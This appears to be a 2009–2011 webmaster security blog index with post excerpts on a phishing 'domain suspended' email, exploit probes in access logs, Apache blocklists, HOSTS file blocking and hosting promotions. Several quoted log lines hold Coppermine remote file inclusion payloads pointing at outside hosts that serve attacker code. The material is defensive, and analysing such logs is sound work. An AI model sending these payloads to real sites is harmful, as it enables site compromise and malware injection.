Keep in mind as you read this, that I received this scam email from one of the email accounts on the supposedly suspended domain! I am posting about it on my blog, which is also hosted under the same domain name! A simple check for my home page shows that it is still up and running. Obviously, the email was a scam, attempting to panic me into opening the attached file. Not going to happen Boris!

Here, for both your amusement and to warn other domain/website owners about the scam, are the significant details from the normally hidden headers.

Received: from home-d805cd5a06 by smtp.wanadoo.fr; Thu, 22 Sep 2011 08:52:00 +0200
Date: Thu, 22 Sep 2011 08:52:00 +0200
Message-ID: <[email protected]>
Subject: Fw: IMPORTANT: wizcrafts.net has been suspended
From: REMOVED@wizcrafts.net
Reply-To: REMOVED@wizcrafts.net
To: REMOVED@wizcrafts.net
Content-Type: text/plain; charset=iso-8859-2



Here is what I saw when I examined the source code in the message body:

aEBb,
lGBf WLHZmMor Qu EpMu JDnky, kSr XuEPqWXQa?
a ue UBpyIYe opY QOdzUCjY.

jZKlDtiul,
tFJLfI wSMDlTD

------------F0C3F295E295E05
Content-Type: application/zip; name="Domain_Abuse_SBL141309_0920.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Domain_Abuse_SBL141309_0920.zip"



Let's examine these items, on at a time and see what they reveal about this message. You can apply the same techniques should you be a domain owner and receive a similar email scam.

Continue reading "Domain suspended email notice contains malware attachment" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 22, 2011

Huge Coppermine Maze Theme Attack on Aug 21-22, 2011

I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.

Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:

64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.

If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed.Next, log into your Coppermine admin panel and go over every setting to see what, if anything has been changed without your knowledge. Visit your gallery, using Firefox, with the NoScript add-on installed and active. View the Source code of your Gallery web pages and press Control + A to highlight all text and codes. Look for 1x1 px iframes with links to outside websites and other bad codes, like JavaScript or meta refresh redirects.

Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that they are not writable by the World; just the Owner (You). 644 is safest (Read-Write for Owner - Read-Read for Group and World) permission, for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.

If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.

If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.

According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.

Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that you web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 3, 2011

Website using WordPress image resizing themes need to take action Now

If you a website owner, or Webmaster and you have installed WordPress blog software with image gallery themes on your websites, you may have a big problem, effective 8/1/2011. These programs are complicated software and as such, are subject to flaws caused by programming oversights. Exploitable scripting flaws have been discovered in a popular plug-in for themes: TimThumb. Those flaws are currently being used to inject malicious scripts and codes into millions of web pages. You need to see if your website is vulnerable to these exploits in the wild.

The details

This particular problem doesn't lie inside the WordPress software itself, but in a third party "plug-in" used by image themes that allow resizing of uploaded images. Those images may be uploaded by the owner of the blog, or by visitors from the Internet. Therein lies the danger.

First of all, you must be running the most current version of WordPress, which at this writing is v 3.2.1, preferably, with only themes approved and delivered through the WordPress website. This will protect the WordPress software itself, until a new vulnerability is discovered and published by hacker groups. Always get on the WordPress mailing list so you are notified when new versions are released. I recommend you bookmark and read this page often: http://wordpress.org/news/category/security/

You still need to check any theme directories (aka Folders) for the presence of the currently exploited file. If you are using an older version of WordPress, you had better upgrade first, at http://wordpress.org/.

The file currently being exploited by remote scanning scripts is named TimThumb.php. This file is used to resize images that are allowed to be uploaded to photo galleries. TimThumb is "inherently insecure" because it writes files into a temporary cache directory when it fetches an image and resizes it. But that directory, which is a sub-directory of your main WordPress directory, is accessible to people visiting the website. An attacker can compromise the site by figuring out how to get TimThumb to grab a malicious PHP file and put it in the WordPress directory. The code will be executed if an attacker then accesses the file using a Web browser.

Continue reading "Website using WordPress image resizing themes need to take action Now" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 1, 2011

Evidence linking Romanian spammers to Ubiquity Servers

On July 27, 2011, I published a blog article about blog spam scripts running on Ubiquity Servers. For several days those POST attempts from Ubiquity IP space disappeared. They returned today, leading me to a most interesting discovery about the source.

Let me show you how I find information about access log spam attempts and deal with them.

In today's first blog spam attempt, an unknown visitor, with the IP address 108.62.150.52, attempted to POST a trackback comment to my Movable Type blog. If the POST was made by a real person, and if that person understood and read the English language, he or she would have read the bold notice that my blog does not accept either comments or trackbacks.

Of course, if the POST was made by a script, it would neither see that notice, nor care about it. Similarly, if the POST was being attempted by somebody in a very foreign country, in say Romania, they would not understand the text in notices I post on every page, regarding no trackbacks allowed. And from where did this POST originate? Romania!

Here then, without any ado, is the chain of evidence linking a blog spam attempt to Romania, from whence a huge amount of spam and online exploits have been traced.

Continue reading "Evidence linking Romanian spammers to Ubiquity Servers" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

July 27, 2011

Blog spam scripts still running on Ubiquity Servers

In 2009 I wrote about trackback spammers using scripts they have installed on servers owned by Ubiquity Server Solutions and Nobis Technology Group before. After 1.5 years they still haven't cleaned up this abuse. It seems that every day or two I see numerous POST attempts to my blog, which are either comment or trackback spam.

I'd like to let the people installing these scripts targeting my blog know, that in my case, their efforts are futile. That is because I run a Perl based Movable Type blog and these spam scripts assume that the target is running on a more common, but less secure, PHP driven blog, usually Wordpress.

It appears that if one uses WordPress as their blog software, a simple POST command is sufficient to post comments or trackbacks to that blog page. Not so with Movable Type! With MT, one must visit a particular scripted page to submit a comment or a trackback. Not only must they have valid credentials to submit, but anything submitted is held until the owner of the blog approves that submission. It goes without saying that nobody in his or her right mind is going to approve spam comments or trackbacks!

I take matters one step farther: I do not accept either comments or trackbacks on any of my blog articles. It says so right at the top of every page on this blog. Yes, I have the scripts installed to do comments and trackbacks, but, they are disabled in the Dashboard. I can't even comment om my own posts. If the time ever comes where I feel like allowing public comments, it will only be from people holding approved credentials and then, all comments would be held for moderation. Nothing would ever get posted that was in any way spammy!

This brings me back to the title of this article. A majority of the failed attempted spam comments and trackbacks are emanating from IP space under the control of Ubiquity Server Solutions. In the last few days I have logged several attempts coming from various IP addresses covered by the following CIDR ranges: 173.234.124.0/22, 173.234.172.0/22 and 173.234.184.0/22. All of these CIDRs are part of the entire Class C network assigned to Ubiquity and Nobis: 173.234.0.0/16.

Note: This CIDR is not the only one assigned to Ubiquity Servers. They hold several other ranges.

So, they're spamming your blogs ... Let's block them from your Apache hosted websites...

Continue reading "Blog spam scripts still running on Ubiquity Servers" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

June 13, 2011

Sometimes spamming does not pay!

You'd think that with the seemingly unstoppable flow of all types of spam, that it must pay fairly decently. It does, for the upper echelon of professional spammers and their top affiliates. But, not necessarily for the lower ranks or those engaging in spam on their own.

Still, paying (for spammers) or not, the spam flood continues. It seems like an impossible task for us little guys to do anything to stop it. But is it really impossible for individual spam recipients to fight back and stop it? Not in this case!

So begins my story, where this little guy was able to make a big difference against a determined spammer. The spam I'm writing about is not your usual type, although it may have also been delivered to others through more typical means. This type of spam is where domain owners, or hired agents post spam links to the websites they are "spamvertising" - in the access logs of innocent websites. This is known as "log spam." They do this in the hopes that these logs may be published for the World to see, and show up in search results for the spamvertised keywords.

Since I have owned domains I have read my access logs, both to see where traffic comes from, and to catch bad behavior before it gets out of control. During the early to mid 2000's, from about 2002 through 2006, it was very common to see spam comments and links posted to a website's access logs, from remote visitors. These visitors were not usually human, but were often automated scripts written to post spam links in the "REFERER" field (that is how it is misspelled in the Apache Server documentation) of typical web logs. The reason they did this was because many cheaply or freely hosted websites published those access logs as viewable by the public, by default.

Fast forward to 2011 and despite the fact that most websites, like mine, have only privately accessible logs, the people wanting to spamvertise their new, often unfriendly websites will employ every tactic available to them. Thus, the spammer who wanted to promote his two new websites decided to post REFERER spam to my access logs. At first this was just an oddity that caught my eye, as it perused the hundreds of lines of hits to my main site. However, I am not your typical Webmaster and I don't have a typical viewpoint for seeing things, with my trained eyes.

Over a period of two weeks I noticed a repeating pattern of obvious spam links for two domains, coming at a short, predictable interval, from two closely related IP addresses. The IP addresses led to a broadband ISP in Czechoslovakia. The websites they were promoting were hosted by a well known hosting company here, in the USA.

Read my extended comments for the rest of the story.

Continue reading "Sometimes spamming does not pay!" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

June 6, 2011

The Toledo Industrial Sewing Machines website in online

After months of preparation and one trip to Toledo, to take photographs, I have finally managed to get the initial version of the Toledo Industrial Sewing Machines website online. It has been quite a task, trying to catch the owner, Bob Kovar, in between him answering phone calls and setting up and repairing industrial sewing machines.

The business is located at 3631 Marine Road, near the airport, in Toledo, Ohio. The building is huge and is thoroughly polluted with industrial sewing machines. They are everywhere; on racks, tables, counters, and on the floor. If it's a sewing machine and built for professional use, they probably have it in stock! I'm talking bar tackers, sergers, walking foot machines, needle feed machines, zig-zaggers, button machines, tailors' machines, shoe patchers, cylinder arm machines, post machines, portable walking foot machines, and ... the entire line of Cowboy sewing equipment. They also have a huge stock replacement parts, needles, bobbins, etc, and nylon thread, in sizes from #46 up to #346.

The website was primarily designed around the Cowboy brand machines, which are highly favored by professional and semi-pro leather crafters. These big leather stitchers are able to sew through 7/8 inch of veg-tan or bridle leather and are used to make holsters, halters, saddles, bridles, reins, dress, gun and weight belts, and all manner of cases, pouches, sheathes and leather bags.

I still have a lot more work to do on the website, but I invite you to go to www.tolindsewmach.com and take a look around. If you know somebody who needs an industrial sewing machine, or a big leather stitcher, tell them about Toledo Industrial Sewing Machines!

If you are looking for a Webmaster, please contact me! I have reasonable hourly rates.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 28, 2010

HostGator extends 50% web hosting discount to Cyber Monday

On Thursday night I wrote a blog article about the then upcoming Black Friday super sale at HostGator web hosting. That sale has come and gone, but, due to popular demand, HostGator is going to run their 50% off all hosting packages and lengths of contract, on Cyber Monday, November 29, 2010. Here are the basic details you need to know.

1: This is a straight 50% off sale, based solely on your first invoice as a new customer.

2: All HostGator hosting packages are included. This means whether you want the cheapest shared hosting or your own dedicated server, you will be invoiced 1/2 of list price.

3: Since the discount only comes off your first invoice, it is wise to buy into as long a term as you can afford. Renewals will be at the going rate, when they come due.

4: This deal does not apply to existing customers with current accounts on HostGator.

5: All you have to do to sign up for any hosting services online at the HostGator website and the 50% off coupon will be AUTOMATICALLY applied.

This is what a typical deal will cost you, based on the four most popular types and lengths of hosting (longer and shorter terms are available):

Shared Hosting: ONLY $2.48/month
Reseller Hosting: ONLY $12.48/month
VPS Hosting: ONLY $9.98 First Month
Dedicated Servers: ONLY $87 First Month

Note: You can get a free domain with your purchase of a hosting package, should you need one. Otherwise, you can transfer your existing domains for free. Here are just a few of the features included in the shared hosting accounts.

* Unlimited Disk Space
* Unlimited Bandwidth
* Free SiteBuilder (Try Demo)
* Easy Control Panel (Try Demo)
* 1-Click Script Installs
* 4,500 Free Website Templates
* 99.9% Uptime Guarantee
* 45 Day Money Back Guarantee
* 24/7/365 Technical Support
* $100 Google AdWords Credit

Get web hosting at HostGatorGet HostGator Web Hosting Now! This promotion will only run Monday November 29th, from 12:00AM to 11:59PM CST (-6 GMT).

If you miss out on this discount, HostGator still has shared hosting plans for as little as $4.95 per month.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 25, 2010

HostGator offers unbelievable 50% to 80% off on Black Friday

If you own domain names and have hosting that is too expensive (especially come renewal time), or want to create your first website, but don't want to be locked into high monthly or annual prices, HostGator has the deal of a lifetime. For one day only, Friday, November 26, 2010, beginning at 12:00 AM Central Standard Time, HostGator is offering the following humongous discounts on all of their web hosting packages (regular $4.95/month for shared hosting, up to $174/month for a dedicated server).

  • 50% OFF EVERYTHING From 12:00AM CST to 5AM CST
  • 80% OFF EVERYTHING From 5AM to 9AM CST (While Spaces last)
  • From 9AM to 11:59PM CST, or after all 80% off accounts have sold out, they will continue to offer 50% OFF ALL HOSTING PACKAGES

This applies to ALL Accounts and ALL Term Lengths. If you are one of the lucky people to get in on the 80% off discount, you will have the opportunity to receive up to 80% off of up to 3 years worth of Hosting! That would come out to $35.64 for 3 FULL YEARS!

The Black Friday discounts include Shared Hosting, Reseller Hosting, VPS Hosting AND even Dedicated Servers! Never before has HostGator allowed such a promotion on EVERYTHING including reseller, VPS and dedicated servers AND ALL Term Lengths.

Note; The discount will apply to your first invoice (first term length you sign up for whether that be 1 month or for 3 years). You may as well sign up for three full years at these prices.

Get web hosting at HostGatorGet HostGator Web Hosting Now! Comes with 24/7 Support via Phone, Live Chat, and Email and a 30 day money back guarantee. Lease terms range from 1 month, up to 3 years.

Remember; all of these discounts end at 11:59 PM, CST! Don't let this one slip past you. Act Now!

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 19, 2009

Block trackback spammer operating on Ubiquity Server Solutions

For the past few days I have discovered that a script, or person operating a server farm, at Ubiquity Server Solutions, is attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet, this spamming idiot keeps blasting away with his script, ignoring a constant flow of Server 403 (Forbidden) responses. The page that the spammer is trying to POST to is no longer on the blog database, having been deleted in the spring of 2006! So, he is wasting his time and amusing me as I look at all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! You will notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May of 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers"not understanding a 403 Forbidden response, when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of Server 403 Forbidden responses by blocking his IP CIDR and his user agent in your public web root .htaccess file, as demonstrated below.



<Files *>
order deny,allow
deny from 64.120.5.0/24
deny from 174.34.144.0/23
</Files>

Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]



You should determine if legitimate visitors to your blogs are using the tbr/0.1.0 user agent. If so, don't block it. In all likelihood, only spammers use that tool with that version number.

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 14, 2009

Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any givien week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending codes to it that are designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve trying to upload or inject a hostile file to a PHP script that is known to be exploitable. These are known a PHP Injection Exploits. Of those targeted scripts, the one that I see almost every day, in my access logs, is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, or hacker, or bot tries to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry:


70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WhoIs lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless InterDomain Routing." It is designated by appending a forward slash and number to the end of a starting IP address, to designate an entire range of IPs assigned to that entity. In this case, 70.84.0.0/14 covers all IPs between 70.84.0.0 trough 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent "Mozilla/5.0" - which is a known hacking tool. Read on and learn to how protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or Mozilla/5.0 hack tools.

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

July 18, 2009

Protect your Apache hosted webite from Chinese exploit attacks

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I was running a vulnerable version of the targeted "Coppermine" software, that upload attempt would have yielded a server 200 Success, instead of a 403 Forbidden response. This would have led to the exploitation of my website and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Continue reading "Protect your Apache hosted webite from Chinese exploit attacks" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 22, 2009

Vulnerabilities roundup for May 18 - 22, 2009

Takeaway

This week has been a headache for the major web software vendors, especially Red Hat Linux and other distributions. Windows users are being targeted by highly critical vulnerabilities in Winamp and Quicktime. Mac users are affected by a flaw in Calendar Objects for Java. So far, between May 18 and 22 there have been at least 85 vulnerability advisories reported by the security investigators at Secunia, 17 of which are rated as "highly critical." I counted at least 7 SQL flaws that can be or are being exploited to inject hostile redirection codes into websites.

Windows Vulnerabilities

On 5/18 /09, Secunia reported an unpatched flaw in Winamp 5.x that can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to the use of vulnerable libsndfile code. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. The vulnerability is confirmed in version 5.552, but other versions may also be affected. Since this vulnerability in currently unpatched, the best advise is to not open untrusted files in Winamp.

A highly critical vulnerability was reported in Apple QuickTime 7.x, on 5/22/09, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site. This flaw is new and unpatched, so you are advised to not browse untrusted web sites, or open PICT files from untrusted sources.

Read about the vulnerabilities affecting other operating systems and software in my extended comments.

Continue reading "Vulnerabilities roundup for May 18 - 22, 2009" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 15, 2009

Securing FormMail scripts against spambots

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknown to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop in secure replacement script known as NMS FormMail, which was developed by a group of calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email account(s) from being harvested by creating alias numbers for them, in NMS FormMail, instead of using plain text addresses to submit to. But, there's more you can do that wasn't covered in my original article.

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder to locate the script for hostile bots it is useless at protecting it against human spammers. All they need to do is to read the source code of your contact, or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special codes, called Mod_Rewrite Directives, that can be applied to a particular server file named .htaccess to completely hide the name of the renamed script, protecting it from being used as a spam relay. If you are allowed to add these directives you can make your FormMail script invisible to spammers.

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 1, 2009

Block Ukrainian Malware Server on Eurohost

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

Any website that is running php or cgi scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of exploitable vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple Quicktime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in (C):\Windows\System32\Etc\, with the unusual file name: HOSTS . Although it has no file extension it can be opened and edited using the built-in Windows Notepad. The HOSTS file takes input in the form of IP addresses and website URLs, separated by a tab or multiple spaces. To protect your computer from being redirected to the hostile tojandglow website, or the Ukrainian server it tries to redirect you to, open your HOSTS file and edit it using these steps.


  1. Using Start > (My) Compute, double-click on the C drive icon, then navigate to your Windows\System32\etc\ folder.

  2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.

  3. Right-click on the file named HOSTS and choose (left click) Properties

  4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked

  5. Click Apply and OK to close the Properties window.

  6. Right-click on HOSTS while holding down the Shift key and select "Open With"

  7. Scroll through the programs list until you find "Notepad" and double-click on it

  8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.

  9. With HOSTS open for editing go to the last line in the file and hit ENTER

  10. Add these lines, with a tab after each 127.0.0.1:

    • 127.0.0.1       tojandglow.com

    • 127.0.0.1       91.212.65.138

    • 127.0.0.1       91.212.65.0/24


  11. Click File > Save and in the File Type selection, choose All FIles and save it as HOSTS, without an extension.

  12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.


Reboot your computer to make this protection take effect. From that point on any script that tries to redirect you to any of the web addresses listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or Local Machine. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). Do the same anytime a new hostile website or ip address is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.

Continue reading "Block Ukrainian Malware Server on Eurohost" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

April 14, 2009

Russian Server sending exploit codes. Block 77.221.128.0/19 now!

